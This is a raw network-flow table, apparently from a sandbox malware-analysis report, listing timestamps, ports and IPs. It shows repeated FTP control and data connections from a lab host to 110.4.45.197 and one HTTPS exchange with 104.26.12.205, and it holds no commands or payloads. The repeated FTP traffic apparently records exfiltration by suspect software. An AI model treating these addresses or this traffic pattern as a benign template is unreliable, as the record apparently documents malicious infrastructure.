Sep 27, 2024 13:10:22.185570955 CEST | 59960 | 49750 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:22.185951948 CEST | 59960 | 49750 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:22.186067104 CEST | 49750 | 59960 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:22.224679947 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:22.513676882 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:22.516904116 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:22.521747112 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:22.701957941 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:22.702133894 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:22.707009077 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:22.847029924 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:22.847414970 CEST | 49752 | 65186 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:22.852679014 CEST | 65186 | 49752 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:22.852802038 CEST | 49752 | 65186 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:22.852849007 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:22.857779026 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:23.032072067 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:23.032488108 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:23.037455082 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:23.385102034 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:23.385229111 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:23.390089989 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:23.682950020 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:23.686599016 CEST | 49752 | 65186 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:23.691596985 CEST | 65186 | 49752 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:23.691737890 CEST | 65186 | 49752 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:23.691812038 CEST | 49752 | 65186 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:23.715152979 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:23.715291977 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:23.722523928 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:23.740365028 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:24.018543005 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:24.044948101 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:24.045090914 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:24.049859047 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:24.068455935 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:24.374522924 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:24.374686003 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:24.379771948 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:24.704941034 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:24.705620050 CEST | 49753 | 51497 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:24.710485935 CEST | 51497 | 49753 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:24.710586071 CEST | 49753 | 51497 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:24.710805893 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:24.715643883 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:25.537411928 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:25.537920952 CEST | 49753 | 51497 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:25.537965059 CEST | 49753 | 51497 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:25.542953014 CEST | 51497 | 49753 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:25.543416023 CEST | 51497 | 49753 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:25.543689013 CEST | 49753 | 51497 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:25.584090948 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:25.868066072 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:25.892936945 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:25.897993088 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:26.223146915 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:26.223920107 CEST | 49754 | 65361 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:26.228841066 CEST | 65361 | 49754 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:26.228899002 CEST | 49754 | 65361 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:26.228996992 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:26.233768940 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:26.766532898 CEST | 49755 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:26.766634941 CEST | 443 | 49755 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:26.766735077 CEST | 49755 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:26.770224094 CEST | 49755 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:26.770261049 CEST | 443 | 49755 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:27.066812992 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:27.115348101 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:27.242949963 CEST | 443 | 49755 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:27.243043900 CEST | 49755 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:27.276046038 CEST | 49755 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:27.276139975 CEST | 443 | 49755 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:27.276385069 CEST | 443 | 49755 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:27.318695068 CEST | 49755 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:27.347425938 CEST | 49755 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:27.395406961 CEST | 443 | 49755 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:27.457593918 CEST | 443 | 49755 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:27.457649946 CEST | 443 | 49755 | 104.26.12.205 | 192.168.2.4 |
Sep 27, 2024 13:10:27.457695961 CEST | 49755 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:27.462587118 CEST | 49755 | 443 | 192.168.2.4 | 104.26.12.205 |
Sep 27, 2024 13:10:28.301472902 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:28.306507111 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:28.306807041 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:28.350281000 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:28.351356030 CEST | 49754 | 65361 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:29.133990049 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:29.134206057 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:29.139206886 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:29.461889982 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:29.462064028 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:29.467634916 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:29.822135925 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:29.826246977 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:29.831170082 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:30.154460907 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:30.154666901 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:30.159470081 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:30.482898951 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:30.483570099 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:30.489854097 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:30.811661959 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:30.812300920 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:30.817274094 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:31.140465021 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:31.141289949 CEST | 49757 | 55730 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:31.146450043 CEST | 55730 | 49757 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:31.146544933 CEST | 49757 | 55730 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:31.146662951 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:31.152157068 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:31.976399899 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:31.976691008 CEST | 49757 | 55730 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:31.976773024 CEST | 49757 | 55730 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:31.981568098 CEST | 55730 | 49757 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:31.982063055 CEST | 55730 | 49757 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:31.982120991 CEST | 49757 | 55730 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:32.021596909 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:32.303776026 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:32.323329926 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:32.328181982 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:32.656864882 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:32.657329082 CEST | 49758 | 60182 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:32.663191080 CEST | 60182 | 49758 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:32.663345098 CEST | 49758 | 60182 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:32.663347960 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:32.668981075 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:33.498569965 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:33.499006033 CEST | 49758 | 60182 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:33.499133110 CEST | 49758 | 60182 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:33.503952026 CEST | 60182 | 49758 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:33.503974915 CEST | 60182 | 49758 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:33.503985882 CEST | 60182 | 49758 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:33.504762888 CEST | 60182 | 49758 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:33.504839897 CEST | 49758 | 60182 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:33.552867889 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:33.828073978 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:33.828564882 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:33.834392071 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:34.156984091 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:34.157469034 CEST | 49759 | 61163 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:34.162374020 CEST | 61163 | 49759 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:34.162461996 CEST | 49759 | 61163 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:34.162580967 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:34.167361975 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:34.992522955 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:34.992733955 CEST | 49759 | 61163 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:34.999034882 CEST | 61163 | 49759 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:34.999120951 CEST | 49759 | 61163 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:35.037350893 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:10:35.323205948 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:10:35.365360022 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:39.040805101 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:39.055085897 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:39.110284090 CEST | 49761 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:39.116904974 CEST | 21 | 49761 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:39.117002010 CEST | 49761 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:39.117321968 CEST | 49761 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:39.127830029 CEST | 21 | 49761 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:39.129703045 CEST | 21 | 49761 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:39.129842997 CEST | 49761 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:39.378043890 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:39.379965067 CEST | 49762 | 52440 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:39.386188030 CEST | 52440 | 49762 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:39.386261940 CEST | 49762 | 52440 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:39.386344910 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:39.397891045 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:40.304414988 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:40.304596901 CEST | 49762 | 52440 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:40.304620028 CEST | 49762 | 52440 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:40.314883947 CEST | 52440 | 49762 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:40.317925930 CEST | 52440 | 49762 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:40.317984104 CEST | 49762 | 52440 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:40.349874973 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:40.667108059 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:40.709254980 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:57.040282011 CEST | 49763 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:57.045429945 CEST | 21 | 49763 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:57.052282095 CEST | 49763 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:57.052282095 CEST | 49763 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:57.057550907 CEST | 21 | 49763 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:57.064270973 CEST | 49763 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:58.709117889 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:58.714050055 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.099595070 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.104652882 CEST | 49764 | 52328 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:59.109605074 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.110402107 CEST | 49764 | 52328 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:59.110579967 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:59.115483046 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.945193052 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.947577953 CEST | 49764 | 52328 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:59.952594995 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.952625036 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.952675104 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.952702999 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.952728987 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.952766895 CEST | 49764 | 52328 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:59.952825069 CEST | 49764 | 52328 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:59.952883005 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.952930927 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.952958107 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.952984095 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.953015089 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.953047037 CEST | 49764 | 52328 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:59.953116894 CEST | 49764 | 52328 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:59.957741976 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.957859993 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.958029032 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.958055019 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.958082914 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.958112955 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.958142996 CEST | 49764 | 52328 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:59.958189011 CEST | 49764 | 52328 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:59.958275080 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.958328009 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.958369970 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.958415985 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.958431959 CEST | 49764 | 52328 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:11:59.958444118 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.958472013 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.958534956 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.963048935 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.963098049 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.963289022 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.963433027 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.963459969 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.963534117 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.963715076 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.964019060 CEST | 52328 | 49764 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:11:59.968400002 CEST | 49764 | 52328 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:00.021800995 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:00.185642958 CEST | 49765 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:00.190757990 CEST | 21 | 49765 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:00.190838099 CEST | 49765 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:00.191011906 CEST | 49765 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:00.196269989 CEST | 21 | 49765 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:00.196331978 CEST | 49765 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:00.780853033 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:01.021878958 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:01.023907900 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:01.023972988 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:02.980319977 CEST | 49766 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:03.038110018 CEST | 21 | 49766 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:03.038214922 CEST | 49766 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:03.038531065 CEST | 49766 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:03.043587923 CEST | 21 | 49766 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:03.043860912 CEST | 49766 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:19.012639999 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:19.017728090 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:19.463406086 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:19.464323997 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:19.528762102 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:19.528964996 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:19.528964043 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:19.544011116 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:19.748332024 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:19.822715998 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.253776073 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.257672071 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.286994934 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.287070036 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.294255972 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.301851034 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.528198004 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.528481007 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.534140110 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.534168959 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.534197092 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.534205914 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.534259081 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.534260988 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.534287930 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.534315109 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.534346104 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.534445047 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.534472942 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
